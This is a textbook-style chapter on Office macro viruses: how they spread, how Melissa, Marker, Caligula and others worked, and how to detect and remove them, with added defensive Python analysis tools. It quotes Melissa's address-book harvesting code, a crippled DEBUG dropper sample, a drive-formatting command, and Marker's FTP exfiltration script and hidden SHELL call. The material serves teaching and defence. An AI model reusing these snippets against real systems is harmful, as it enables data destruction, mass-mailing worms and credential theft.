Macro Viruses




What Is a Macro Virus?

A simple macro is a series of steps that could otherwise be typed, selected, or configured, but that are stored in a single location so they can be automated.

Many programs, such as Word, let you record a series of keystrokes and menu selections and save them to a file. Although nifty, creating a macro one keystroke at a time doesn't make for fast or sophisticated application development, so macro languages exist to allow more sophisticated macro development and environment control.

A macro language is a programming language, but it has its drawbacks. First, and most obvious, it cannot run without the underlying application. This leads into the second drawback: macro languages are usually interpreted, not compiled. Each macro command must be broken down into its runtime counterpart at execution time, and this translation takes time. Macros that are large, or that manipulate large amounts of data, run very slowly.

Why Virus Writers Like Macro Viruses

- They are easy to write.

- Everyone exchanges documents and data, so macro viruses reach more people than their more complex executable counterparts.

- Macro viruses can be cross-platform and cross-application, infecting any computer capable of running Office, or even different applications that share the same underlying macro language.

- Internet Explorer can automatically download Office documents from the Web or from within emails without prompting the user to confirm the download.

How Macro Viruses Spread

With few exceptions, macro viruses are spread when a user opens or closes an infected document. The document contains a macro that then infects the user's program and other documents, and the cycle is continued. Documents are spread between users in the following ways: email, diskette, Internet, and CD-ROM.

What a Macro Virus Can Do

A macro virus author can program his creation to do almost anything that is possible on a PC. It can corrupt data, create new files, move text, flash colors, insert pictures, send files across the Internet, and format hard drives. Not limited to the already powerful macro language commands, macro viruses are increasingly used as transport mechanisms to drop off even nastier bugs. Macro viruses can use the VBA SHELL command, or call Windows API functions directly through VBA's Declare statement, to run any external command they want. The VBA KILL command can delete files. Macro viruses modify the registry, use email to forward copies of themselves to others, look for passwords, copy documents, and infect other programs. Macro viruses can do a lot of different damage in a lot of different ways.

Microsoft Word and Excel Macros

Although applications may share a common macro language, each has its own structure and way of operating. Macros written for one type of application usually do not work in another. Manipulating a document in Word is completely different from moving around in an Excel workbook. Even similar operations, such as adding together the numbers from two cells, bear little resemblance to each other behind the scenes. To understand macro viruses, you must understand how each application uses macros.

Word Macros

Although macros in Word can be saved in a document, they are more often stored in a separate file type called a template (prior to Word 97, macros had to be stored in a template). The template can contain many of the settings a user wants in her default document: font type, toolbar settings, key assignments, styles, font size, page layout, and so on. Every Word document is based on a template, and that template is linked to the document. Whenever an existing or new document is opened, the template settings are applied first. A global template, usually called NORMAL.DOT, is loaded in memory every time Word runs. This is a favorite target of virus writers, because a macro placed there runs in every Word session and can reach every document the user opens, creates, or saves.


Automacros

Like other applications with macro languages, Word and Excel can automatically launch a macro when a document or template is opened, or whenever some other key event occurs. This is done by naming a macro after a predefined keyword reserved for that purpose. Here are the automacros especially coveted by Word virus writers:

- AutoExec: runs whenever you start Word or load the global template

- AutoOpen: runs whenever you open an existing document (Auto_Open in Excel)

- AutoNew: runs whenever you create a new document

- AutoClose: runs each time you close a document (Auto_Close in Excel)

- AutoExit: runs whenever you quit Word or unload the global template

There are other system macros, such as FileSave and FileClose in Word and Workbook_Activate and Workbook_Deactivate in Excel, that run automatically when their associated event happens; a macro named FileSave, for example, runs when the user saves a file. There are even system macros associated with individual menu options that let programmers define what happens when a particular menu option is chosen. Virus writers love to hide their creations by rewriting what happens when a user chooses Tools->Macro, using a macro called ToolsMacro (a technique known as menu interception).

Excel Macros

Excel data files are called workbooks and have an .XLS extension. Each workbook can contain many worksheets (also known as sheets or spreadsheets). Each sheet has its own tab within the workbook. Macros in Excel can be stored in the same workbook as the data, but can also be stored in separate workbooks. Macros meant to be available to all workbooks are usually stored in a workbook called PERSONAL.XLS. This file functions much like a global template in Word.

Excel's automacros are called Auto_Open and Auto_Close and are used in the same way as automacros in Word. Macros can also be activated by key combinations, menu choices, and sheet activity. A macro virus that wants to run in every session need only infect a workbook and store a copy in Excel's startup directory (XLSTART); when Excel loads, the virus loads. Most Excel viruses infect the current workbook, usually through a hidden sheet within the workbook, and also infect a startup directory workbook.

Office 2000 Security

[Figure: Office 2000 macro warning dialog box]

Security Levels

In Office 2000, you can set macro security to High, Medium, or Low within each supported application. High, the default, silently disables all unsigned macros; macros signed by a source on your trusted list run without comment, and a signed macro from a source not yet trusted produces a warning dialog in which the user can enable it or add the signer to the trusted list. Medium prompts the user to enable or disable any macros that are not from a trusted source. Low lets all macros run automatically without prompting the user. You get to macro security by choosing Tools->Macro->Security.

[Figure: Office 2000 macro security menu]

Signed Macros

[Figure: Warning from document containing an unauthenticated, signed macro]

Macro Virus Technologies

This section of the chapter will cover how macro viruses work and the different technologies they use to spread. I will give more coverage to Word and Excel viruses because they represent the vast majority of macro viruses in the wild. Viruses for Access, PowerPoint, Corel Draw, etc. spread using similar concepts with different replication approaches and macro commands.

Word Infections

[Figure: Word macro virus infection pathway]

Typically, menu options are rewritten by malicious macros to help the infection process. For example, a macro with the name FileSave will allow a programmer to redirect what happens when a Word user chooses File->Save from the menu bar.

Excel Infections

The Excel macro virus Laroux is one of the most widely reported virus infections in the world today and is a good example to walk through. Written in 1996, it used VBA to infect Excel 5.0 and later versions. When an infected workbook is opened, the virus uses the Auto_Open macro to hand control to its main macro, check_files. The virus then checks whether it has already infected the current workbook and whether an infected copy is stored in Excel's startup directory. If not, it infects the current workbook by creating a hidden infected sheet, and saves a copy of itself to a file in the startup directory so that it is loaded every time Excel starts. From then on it infects any workbook whose sheet is activated. It contains no intentionally destructive routines, but can still cause problems because of its lack of error checking: macros and data can be inadvertently overwritten as the virus goes to work.

General Macro Virus Techniques

Advances in antivirus technology and Microsoft security changes forced macro virus writers to learn new tricks. This next section talks about macro virus technologies beyond the early examples.

Email viruses

Unfortunately, using VBA it is all too easy for a virus to send itself to other victims by email. VBA lets a virus query the system for the installed email application, log on to the user's existing mail profile, read the address book, and send an attachment. MAPI, the Messaging Application Programming Interface, is the de facto standard for Windows email programs; it can be used from many languages to send email from a user's workstation to another user. The example below shows how the Melissa virus read the address book of an infected user to collect up to 50 recipient addresses to send itself to:

Melissa virus code sample

;Comments by Roger A. Grimes

Set UngaDasOutlook = CreateObject("Outlook.Application")

;creating an instance of Outlook

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

;registry marker: only proceed if this user has not already been mailed from

If UngaDasOutlook = "Outlook" Then

;if Outlook is the email engine...

DasMapiName.Logon "profile", "password"

;log on to the user's MAPI session (DasMapiName is the MAPI namespace object obtained from Outlook; that line is not shown here)

For y = 1 To DasMapiName.AddressLists.Count

;set up getting ready to count number of contacts in address book

Set AddyBook = DasMapiName.AddressLists(y)

x = 1

Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

For oo = 1 To AddyBook.AddressEntries.Count

Peep = AddyBook.AddressEntries(x)

BreakUmOffASlice.Recipients.Add Peep

x = x + 1

If x > 50 Then oo = AddyBook.AddressEntries.Count

Next oo

;get up to 50 email addresses from address book

;end of Melissa code sample

 

Using those lines of code, Melissa spread around the world in three days and forced some of the world's largest organizations to shut down their email servers. It also earned its author a criminal conviction. The malicious emailing is done in the background without the user noticing, apart from some temporary slowness. Hundreds of macro viruses now use VBA and MAPI to send themselves around the world, effectively forming a new class of worms. The proliferation of emailing viruses has led most corporations to install a virus scanning engine on their email servers to remove the virus before it reaches the end user.

Stealth macro viruses

Encrypted and polymorphic macro viruses

Like their executable counterparts, many macro viruses change their appearance to avoid scanning detection. Random encryption routines are used to hide the virus code, but the cipher routines tend to be weaker than their executable virus counterparts. Some viruses randomly rename the macro names and memory variables. Others create their macros on the fly. They do this by storing most of the macros as plain text within the document, and calling a built-in macro builder. The macro builder then builds the macros and executes them.

Dropping off a friend

One of the scariest mechanisms a macro virus can contain is a routine to install a more dangerous virus or Trojan. Although most macro languages limit what can be manipulated to the application itself, sophisticated macro languages (like WordBasic and VBA) allow external files and the operating system to be modified: external files can be created, and existing files deleted or modified. Many macro viruses write a text file of hexadecimal byte codes (machine code) to the user's hard drive, and then modify AUTOEXEC.BAT so that the next time the PC is rebooted, DEBUG.EXE is called to turn the text file into an executable, which is then run. Thus an even more malicious virus or Trojan can attack a computer, and all the user did was open a Word document sent by a friend or coworker. An early macro virus named Nuclear was the first to include a virus dropper (although the first versions were too buggy to work). The example below shows sample code that could be used in conjunction with DEBUG.EXE to drop a file virus (the code is deliberately crippled).

Example of macro virus coding to drop off a file virus

;First part of code creates the source code file to be compiled later

Open "C:\VIRUS.SCR" For Output as #1

;Source code called VIRUS.SCR

Print #1, "N "

;Compiled code will be called

;Next commands write in hexadecimal codes

Print #1, "E 0840 81 3C 44 75 21 80 3C 4D 74 12 80 3C 54 74 0D 8B"

Print #1, "E 0850 44 01 48 8E C0 03 44 03 8E D8 EB E9 8D 03 26 2B"

Print #1, "E 0860 44 F2 26 89 44 F3 1F 8C D8 2B E8 95 05 4D 01 2E"

Print #1, "E 0870 8C 1E 8E 05 0E 1F A3 95 05 8E C2 B0 D6 A2 B4 04"

Print #1, "E 0880 B9 DC 14 33 F6 33 FF FC F3 A4 8E D9 8C 06 E3 04"

Print #1, "Q"

;Quit DEBUG.EXE

Close #1

;next create a batch file that will compile the virus

;needs to be added to autoexec.bat so that the next time the PC is

;rebooted, virus will run

Open "C:\GOTYA.BAT" For Output as #1

Print #1, "debug < C:\VIRUS.SCR > nul"

;Feeds source code into DEBUG.EXE command to compile file

Print #1, "echo @C:\>>C:\AUTOEXEC.BAT"

;inserts compiled virus into autoexec.bat file so it gets run after the

;next reboot.

Close #1

ChDir "C:\"

Shell "GOTYA.BAT", 0

;Shell command runs batch file to compile virus and modify autoexec.bat

;end of example

 

If you see code resembling the example above, you can be almost 100 percent sure it is a virus or Trojan.
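To see what a dropped DEBUG script would build without ever running DEBUG, the following Python parser is an added example (not code from the book): it replays the E, N, RCX and W commands into an in-memory image, reports the bytes and their hash, and says whether the script would ever write a file to disk. Both scripts embedded in it are constructed for the demo; the first assembles a harmless 14-byte COM program, the second has the same shape as the crippled sample above (E lines and Q, but no file name and no W).

```python
"""Replay a DEBUG.EXE script into memory to see what it would build, without
running DEBUG. Added example; not code from the book. Both scripts below are
constructed: the first assembles a harmless COM program, the second mimics the
shape of a crippled dropper (bytes and Q, but no N name and no W)."""
import hashlib
import re

# "E addr b0 b1 ..." enters bytes at a hex offset. DEBUG loads .COM images at 0100h.
E_RE = re.compile(r"^E\s+([0-9A-Fa-f]{1,4})\s+((?:[0-9A-Fa-f]{2}\s*)+)$", re.I)


def parse_debug_script(text: str):
    """Return (image, meta): image maps offset -> byte value; meta records the
    N (file name), RCX (length), W (write) and Q (quit) commands seen."""
    image = {}
    meta = {"name": None, "length": None, "writes": 0, "quit": False, "unknown": []}
    expect_cx = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_cx:                      # the line after RCX is the new CX value
            meta["length"] = int(line, 16)
            expect_cx = False
            continue
        m = E_RE.match(line)
        up = line.upper()
        if m:
            off = int(m.group(1), 16)
            for i, b in enumerate(m.group(2).split()):
                image[off + i] = int(b, 16)
        elif up == "N" or up.startswith("N "):
            meta["name"] = line[1:].strip() or None
        elif up == "RCX":
            expect_cx = True
        elif up == "W":
            meta["writes"] += 1            # W writes BX:CX bytes from CS:0100 to the N file
        elif up == "Q":
            meta["quit"] = True
        else:
            meta["unknown"].append(line)
    return image, meta


def image_bytes(image: dict) -> bytes:
    """Flatten the sparse image into a contiguous blob (gaps zero-filled)."""
    if not image:
        return b""
    lo, hi = min(image), max(image)
    return bytes(image.get(o, 0) for o in range(lo, hi + 1))


def summarize(text: str) -> dict:
    image, meta = parse_debug_script(text)
    blob = image_bytes(image)
    return {
        "name": meta["name"],
        "start": min(image) if image else None,
        "size": len(blob),
        "declared_length": meta["length"],
        # Nothing reaches disk unless the script names a file and issues W.
        "would_write": bool(meta["writes"] and meta["name"]),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "unknown_commands": meta["unknown"],
    }


# Constructed: mov ah,9 / mov dx,010Bh / int 21h / mov ah,4Ch / int 21h, then "hi$".
COMPLETE_SCRIPT = """\
N DEMO.COM
E 0100 B4 09 BA 0B 01 CD 21 B4 4C CD 21
E 010B 68 69 24
RCX
E
W
Q
"""

# Constructed: same shape as the crippled sample above; DEBUG would enter the
# bytes in memory and quit without writing anything.
CRIPPLED_SCRIPT = """\
N
E 0840 90 90 90 90
Q
"""

if __name__ == "__main__":
    for title, script in (("complete", COMPLETE_SCRIPT), ("crippled", CRIPPLED_SCRIPT)):
        s = summarize(script)
        print(title, s["name"], hex(s["start"]), s["size"], "bytes, would_write:", s["would_write"])
        print("  ", image_bytes(parse_debug_script(script)[0]).hex(" "))
```

DEBUG only writes a file when it sees W, and then writes BX:CX bytes starting at CS:0100 to the file named by N. A script that enters bytes at 0840 but never names a file, never sets RCX and never issues W, like the crippled sample, builds nothing on disk, and the would_write flag records exactly that; when a real dropper is recovered, the sha256 of the reconstructed blob is what you search for in malware databases.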

More external manipulation with VBA

VBA contains plenty of functionality that lets macro viruses interact with the PC outside the scope of the application. Here are a few examples:

- The VBA KILL command deletes any file on the local hard drive. It supports wildcards (* or ?), although it does not work on Macintosh versions of Word.

- Macro viruses can delete subdirectories with the RMDIR command.

- The SHELL command is the most powerful of all and allows any external command to be executed.

- Better yet for malicious code writers, SHELL takes a window-style parameter, vbHide, that runs the external command in a hidden window.

These commands alone make any PC vulnerable to numerous types of attack.
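The commands just listed, the automacro and menu-interception names from the Word Macros section, the Outlook and MAPI calls in the Melissa sample, the VBProject export/import trick used by viruses such as Caligula, and the registry tampering described for W2KM_PSD together make a workable static triage rule set. The Python script below is an added example, not code from the book or from any antivirus product: it takes the text of a VBA module (as exported from the Visual Basic Editor, or pulled out of a document with a tool such as olevba) and reports which indicators are present, with a rough score. Both module texts inside it are constructed for the demo; the "malicious" one imitates the techniques this page describes and contains no working virus.

```python
"""Static triage of VBA module text for the macro-virus indicators described on
this page. Added example; not code from the book or any antivirus product.
Both sample modules at the bottom are constructed for the demo."""
import re

# Names Word and Excel run without user action (automacros and document/workbook events).
AUTOMACROS = {n.lower() for n in (
    "AutoExec", "AutoOpen", "AutoNew", "AutoClose", "AutoExit",
    "Auto_Open", "Auto_Close", "Document_Open", "Document_Close",
    "Workbook_Open", "Workbook_Activate", "Workbook_Deactivate")}
# Built-in command names a macro can shadow so a menu choice runs virus code instead.
MENU_INTERCEPTS = {n.lower() for n in (
    "FileSave", "FileSaveAs", "FileClose", "FileOpen", "FileNew",
    "ToolsMacro", "ViewVBCode", "FileTemplates")}

# label -> (pattern, weight); patterns run per line after comment stripping.
INDICATORS = {
    "shell":            (re.compile(r"\bShell\b", re.I), 3),
    "vbhide":           (re.compile(r"\bvbHide\b", re.I), 2),
    "delete":           (re.compile(r"\b(?:Kill|RmDir)\b", re.I), 2),
    "api_declare":      (re.compile(r"\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\b", re.I), 2),
    "mail_automation":  (re.compile(r'"Outlook\.Application"|GetNameSpace\s*\(\s*"MAPI"|\bRecipients\.Add\b', re.I), 3),
    "self_replication": (re.compile(r"\bVBProject\b|\bVBComponents\b|\bAddFromString\b|\bOrganizerCopy\b|\.Export\b|\.Import\b", re.I), 3),
    "security_tamper":  (re.compile(r"\bVirusProtection\b|Office\\\d+\.\d+\\\w+\\Security|\bDisableAutoMacros\b", re.I), 3),
    "file_drop":        (re.compile(r"\bOpen\b.*\bFor\s+(?:Output|Append|Binary)\b", re.I), 1),
    "registry_marker":  (re.compile(r"\bPrivateProfileString\b", re.I), 1),
}
WEIGHTS = {"automacro": 3, "menu_intercept": 3, **{k: w for k, (_, w) in INDICATORS.items()}}
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+|Friend\s+)?(?:Static\s+)?(?:Sub|Function)\s+(\w+)", re.I)


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment (and Rem lines), ignoring apostrophes inside string literals."""
    if line.lstrip().lower().startswith("rem "):
        return ""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan(vba_source: str) -> dict:
    """Return the indicator hits found in one module, with a weighted score."""
    findings = []                                   # (label, line_no, evidence)
    for no, raw in enumerate(vba_source.splitlines(), 1):
        line = strip_comment(raw)
        if not line.strip():
            continue
        m = PROC_RE.match(line)
        if m:
            name = m.group(1).lower()
            if name in AUTOMACROS:
                findings.append(("automacro", no, m.group(1)))
            elif name in MENU_INTERCEPTS:
                findings.append(("menu_intercept", no, m.group(1)))
        for label, (rx, _) in INDICATORS.items():
            if rx.search(line):
                findings.append((label, no, line.strip()))
    labels = sorted({f[0] for f in findings})
    return {"findings": findings, "labels": labels, "score": sum(WEIGHTS[l] for l in labels)}


def verdict(score: int) -> str:
    # An automacro alone is only "suspicious": legitimate templates use them too.
    if score >= 6:
        return "likely malicious"
    if score >= 3:
        return "suspicious"
    return "no indicators"


# Constructed: an ordinary worksheet helper with no indicators.
BENIGN_MODULE = r"""Attribute VB_Name = "Module1"
Function SumRange(r As Range) As Double
    Dim c As Range
    For Each c In r
        SumRange = SumRange + c.Value
    Next c
End Function
"""

# Constructed: imitates the techniques this page describes; it is not a working virus.
MALICIOUS_MODULE = r"""Attribute VB_Name = "Module1"
Sub AutoOpen()
    ' constructed sample, modelled on the techniques this page describes
    Options.VirusProtection = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"
    If NormalTemplate.VBProject.VBComponents.Count < 2 Then
        ActiveDocument.VBProject.VBComponents(1).Export "C:\IO.VXD"
        NormalTemplate.VBProject.VBComponents.Import "C:\IO.VXD"
    End If
    Kill "C:\TEMP\*.TMP"
    Open "C:\GOTYA.BAT" For Output As #1
    Print #1, "@echo off"
    Close #1
    Shell "C:\GOTYA.BAT", vbHide
End Sub

Sub ToolsMacro()
    ' menu interception: the real Tools->Macro dialog never appears
End Sub
"""

if __name__ == "__main__":
    for title, module in (("benign", BENIGN_MODULE), ("malicious", MALICIOUS_MODULE)):
        r = scan(module)
        print(f"{title}: score={r['score']} verdict={verdict(r['score'])}")
        for label, no, evidence in r["findings"]:
            print(f"  line {no:2d} {label:17s} {evidence}")
```

The weights are deliberately coarse: a single hit on Shell or VBProject is worth following up on its own, while an AutoOpen procedure by itself only marks the module as worth a look, since corporate templates legitimately use automacros. Comments are stripped before matching so that a virus cannot hide an indicator from the scanner, but equally so that a harmless comment mentioning "Shell" does not trip it.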

Startup directory files

Most Microsoft Office applications have a Startup directory, configurable under Tools->Options. Any templates stored there are loaded automatically when the corresponding application starts. To make matters worse, Office does not warn users about macros contained in these files (even when security is set to High), because Office 2000 trusts all installed add-ins and templates by default. Many antivirus researchers believe this is a huge mistake on Microsoft's part, and it opens big holes that macro virus writers capitalize on.

Random evolution

Because macro viruses can contain many of the same macro names, such as AutoOpen or FileSaveAs, it is not uncommon for a document infected with two different macro viruses to end up creating a new virus that includes routines from each of the former. The WM.Colors.B macro virus contains Colors and Concept virus routines. Randomly evolving viruses have been speculated from the start (Dr. Fred Cohen discussed them frequently), but they were not a reality until the forgiving nature of the macro language appeared. There have been a few other variants produced from executable viruses, but the complexity of moving file pointers and entry points usually produces a nonreproducing offspring or one virus completely disables the other.

within weeks, each with a different method of infection.


Macro Virus Examples

Here are some representative sample descriptions that demonstrate the versatility of macro viruses.

W97M.Melissa.ac

This Melissa variant attempts to format local hard drives and corrupt CMOS memory, in addition to using email clients to forward itself. It drops a batch file, DRIVES.BAT, containing the following command, repeated for every drive letter from D through Z:

echo y|format/q d: /v:Empty>NUL

It also edits AUTOEXEC.BAT to run a dropped malicious executable. That executable attempts to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not cause permanent damage to the CMOS.

W97M.Marker

Marker is a Word macro virus that keeps track of who it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS. The .SYS file contains the virus code and the .VXD file is a script file that is used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in the example below:

Example Marker virus FTP script file

o 209.201.88.110

;opens an ftp connection to hacker's ftp site

user anonymous

;logs user in as anonymous

pass itsme@

;puts in password

cd incoming

;changes to subdirectory called incoming on hacker's site

ascii

;puts file transfer in ascii text transmission mode

put hsfedrt.sys

;uploads tracking information to ftp site, where hsfedrt.sys can be any

;randomly generated name.

quit

;ends ftp session

 

The macro code contains the following SHELL command, which allows it to do its work secretly:

SHELL " /C FTP.EXE -n -s:c:\netldx.vxd", vbHide

 

It also disables Word's macro warning prompt. It keeps track of the user information found in Word's User Name and User Address information fields. Thus, anyone infected can usually find out who infected them and trace the origin of the virus back several generations. The virus maintains a setting in the registry (HKCU\Software\Microsoft\MS Setup (ACME)\User Info\LogFile) to keep track of whether it has sent information from this particular user before. If so, it doesn't do it again.

Note: Although ACME conjures up images of Road Runner cartoons, it is a valid subkey name created by Microsoft's installer and not by the virus.
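For incident response, the useful fields in a dropped FTP script are the destination, the credentials and the file pushed. The Python below is an added example (not from the book) that parses an FTP.EXE -s: script of the kind Marker writes and pulls those fields out, and separately parses the launching SHELL line to recover the script path and the -n (no auto-login) flag. The script text and the command line are constructed for the demo and use a documentation IP address; the command-interpreter path in the constructed command line is an assumption.

```python
"""Extract IOCs from an ftp.exe -s: script of the kind Marker drops, and from
the SHELL line that launches it. Added example; not code from the book. The
script and command line below are constructed for the demo."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class FtpIocs:
    host: Optional[str] = None
    port: int = 21
    user: Optional[str] = None
    password: Optional[str] = None
    cwd: str = "/"
    mode: str = "ascii"
    uploads: List[Tuple[str, str]] = field(default_factory=list)   # (local file, remote path)
    downloads: List[str] = field(default_factory=list)
    closed: bool = False


def parse_ftp_script(text: str) -> FtpIocs:
    """Walk the script the way ftp.exe would, tracking the remote cwd so that
    'put' yields a full remote path. With -n there is no auto-login, so the
    user and pass commands are in the script itself."""
    ioc = FtpIocs()
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd in ("o", "open") and args:
            ioc.host = args[0]
            ioc.port = int(args[1]) if len(args) > 1 else 21
        elif cmd == "user" and args:               # "user name [password]"
            ioc.user = args[0]
            if len(args) > 1:
                ioc.password = args[1]
        elif cmd == "pass" and args:
            ioc.password = args[0]
        elif cmd == "cd" and args:
            ioc.cwd = args[0] if args[0].startswith("/") else ioc.cwd.rstrip("/") + "/" + args[0]
        elif cmd in ("ascii", "asc"):
            ioc.mode = "ascii"
        elif cmd in ("binary", "bin"):
            ioc.mode = "binary"
        elif cmd in ("put", "send") and args:      # "put local [remote]"
            local = args[0]
            remote = args[1] if len(args) > 1 else local
            ioc.uploads.append((local, ioc.cwd.rstrip("/") + "/" + remote))
        elif cmd in ("get", "recv") and args:
            ioc.downloads.append(ioc.cwd.rstrip("/") + "/" + args[0])
        elif cmd in ("quit", "bye"):
            ioc.closed = True
    return ioc


def parse_ftp_launch(command_line: str) -> dict:
    """Pull the script path and the flags that matter out of the command that
    launches ftp.exe (for instance the string argument of a VBA SHELL call)."""
    m = re.search(r'-s:([^\s"]+)', command_line, re.I)
    tokens = command_line.replace('"', " ").split()
    return {
        "script": m.group(1) if m else None,
        "no_autologin": "-n" in tokens,
        "hidden": "vbHide" in tokens,
    }


def report(script_text: str, launch_line: str) -> dict:
    """One flat IOC record suitable for a ticket or a blocklist."""
    ioc = parse_ftp_script(script_text)
    launch = parse_ftp_launch(launch_line)
    return {
        "exfil_host": ioc.host,
        "exfil_port": ioc.port,
        "credentials": (ioc.user, ioc.password),
        "files_uploaded": [remote for _, remote in ioc.uploads],
        "local_sources": [local for local, _ in ioc.uploads],
        "transfer_mode": ioc.mode,
        "script_path": launch["script"],
        "no_autologin": launch["no_autologin"],
        "hidden_window": launch["hidden"],
    }


# Constructed in the shape of Marker's script; 198.51.100.7 is a documentation address.
MARKER_STYLE_SCRIPT = """\
o 198.51.100.7
user anonymous
pass itsme@
cd incoming
ascii
put hsfedrt.sys
quit
"""
# Constructed; the COMMAND.COM path is an assumption, not taken from the page.
LAUNCH_LINE = r'SHELL "C:\COMMAND.COM /C FTP.EXE -n -s:c:\netldx.vxd", vbHide'

if __name__ == "__main__":
    for k, v in report(MARKER_STYLE_SCRIPT, LAUNCH_LINE).items():
        print(f"{k:15s} {v}")
```

The -n flag is the tell that credentials live in the script rather than in a netrc-style file, and the hidden-window flag explains why the user never saw a console. On a live system the script file is usually deleted after the transfer, so the content to feed this parser often has to be recovered from the macro's Print # statements or from unallocated disk space.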

 

The example below shows a log file from a sample I received (names and addresses have been changed to protect the innocent):

Marker virus log file

'Logfile

'09:08:36 - Saturday, 28, Nov 1998

'Richard D. Collier, III

'

'

'02:50:31 PM - Saturday, 28 Nov 1998

'Elizabeth Rose'

'Straight-A Students, Inc.

'

'12:49:03 PM - Saturday, 9 Jan 1999

'Lillian Hanson

'Genius Tutoring

'Two Embargo, Suite 3800

'Richmond, CA 94111



Caligula Word Virus

The Codebreakers group released another intriguing macro virus, this one attempting to steal users' PGP private keys. PGP, or Pretty Good Privacy, is one of the world's most popular data and email encryption programs. Each PGP user has a private key, used to decrypt messages and to sign them; the private key ring is itself encrypted, but usually only with a weak passphrase. The Caligula virus is a stealth Word infector written in VBA5. When loaded, it checks whether the current Word document or the global template contains a class module called Caligula. If not, it exports its source code to a file called IO.VXD and imports it into the global template. On the 31st of any month it displays the message "No cia, No nsa, No satellite, Could map our veins. WM97/Caligula © Opic [Codebreakers 1998]."

Each time the virus runs, it checks whether it has already tried to steal the user's PGP private key by looking for a value named Caligula under the registry key HKCU\Software\Microsoft\MS Setup (ACME)\User Info. If the value is present, the virus has already tried, or PGP is not installed on the PC. If not, it reads PGP's install path from the registry and searches for the private key ring, which by default is named SECRING.SKR. Next, it creates a text file, CDBRK.VXD, as an FTP script to upload the user's private key ring to the Codebreakers' FTP site. On systems without PGP, the virus simply keeps replicating like any other macro virus. I'm not sure of the legal reasoning, but many computer security experts said that this action (stealing a user's private encryption key) did not violate U.S. law. Luckily, the Codebreakers web site was shut down in an unrelated hunt for the Melissa virus writer.

Triplicate Virus

Triplicate is a common macro virus and the first to infect three applications: Word, Excel, and PowerPoint. It infects the global template in Word, places an infected workbook called BOOK1 in Excel's Startup directory, and creates a new macro module called Triplicate in PowerPoint. Triplicate was initially placed on a virus writer's web site, hidden behind a web link; clicking the link loaded an infected document, which in many cases opened in Word from within the browser without setting off any macro virus warnings.

GaLaDRieL

GaLaDRieL is the first virus based on Corel Script, the macro language for Corel Draw. It does a simple file search for new victim files (files with .CSC extension and the appropriate attributes). When a suitable file is found, it looks for the following text, "REM ViRUS," which identifies previously infected files. Its nonmalicious payload goes off on June 6 and displays an excerpt from The Lord of The Rings.

W2KM_PSD

Long before Office 2000 was officially released, it had its first macro virus. This polymorphic class virus waits until the day of the month is the same as the current minute, and then fills the current document with between 1 and 70 random shapes. It disables Word 2000's macro security by modifying the following registry key: HKCU\Software\Microsoft\Office\9.0\Word\Security.

Detecting Macro Viruses

Macro viruses are contained in frequently shared data files, which makes them good at spreading and explains why they are currently the most common type of malicious code on the planet. However, there are dozens of symptoms, beyond your virus scanner going off, that should make you suspect a macro virus. Most of these apply to Word macro viruses, but others apply to any type.

Macro Warnings

Your Word Document Will Only Save as a Template

[Figure: Notice the difference between the document type icons]

Unexpected Document Modifications, Words, Messages, Graphics

New Macros Appear

Tools->Macro Is Disabled

Global Template File Date Is Current

Startup Directory Contains New Files

Removing Macro Viruses and Repairing the Damage

When a macro virus infects an application, at the very least, it infects the current document and autoloading data. An ever-growing number of macro viruses edit your registry, drop off or modify batch files, disable your menus, and cause all other sorts of damage. When you need to disinfect a system from a very ambitious virus, there is no one tool that can look for and remove all traces at once. Always start by trying to use your antivirus scanner. I've included five steps for manually removing macro virus code. Removing a virus by hand means learning everything you can about the virus. Learn about its actions, file and registry manipulations. 

Try a Virus Scanner

Using a current, reputable virus scanner should still be your first line of defense and removal. Most virus scanners can detect and repair the document damage done by most macro viruses, and do it more quickly than you can do it by hand. Most do not repair your registry, re-enable your application's virus protection, or fix other modifications to your system. They simply remove the macro virus from infected files. If you are allowing a scanner to remove a new virus for the first time, make a backup copy of the infected file first (most antivirus tools have this as an option during the cleaning). Some documents you clean can be completely ruined by macro virus cleaning tools. Also, macro virus removers typically remove all macros found in a document, even if they had nothing to do with the virus. 

If your virus scanner turns up nothing, but you still suspect a virus, try these next five ideas.

Get a Clean Application

Getting a clean application starts with getting a clean global template and clean startup files. If any of your global templates have become suspect (and the scanner didn't find anything), rename or delete them using Explorer while the application is closed. For both Word and Excel, search for and delete or move any infected files in your Startup directories. When you restart Word, it will re-create a clean global template and give you a clean environment to work with. If you had special settings or macros stored in a template that you wanted to retain, you should manually reset them in the new template.

Bypass Automacros

If you suspect a macro virus, it cannot hurt to hold down your Shift key while opening Word or Excel, or while opening up a document, workbook, or template. Doing so will automatically disable any automacros present. The Shift key can be held down while exiting to disable any AutoClose macros. This measure only provides a temporary answer, and most macro viruses utilize other menu commands, like FileSaveAs, to do their dirty work.

Note: This bypassing trick does not always work, especially in Word 6.0, so check whether the virus is still active afterward.

 

Inspect Data and Delete Malicious Macros

Open up your suspected macro document, being sure to disable macros. You have three macro tools within Office at your disposal: Macro Editor, Organizer, and Visual Basic Editor. I usually use all three to ensure everything is cleaned up. Make sure the infected document is in the active window. Use the Macro Editor, Tools->Macro->Macros to view and delete any visible macros. Be sure to click All active templates and documents at the bottom. Choosing the Edit option opens up VBE so you can inspect the macro code closer. With VBE, you can remove individual macro lines, although since most documents and workbooks shouldn't contain macros, it's just as easy to delete the whole macro in the Macro Editor or Organizer. You can't view or edit macro code in the Organizer, as it acts on the macro as a whole. Clean any suspected templates before cleaning files, or else your hard work will be for naught.

 
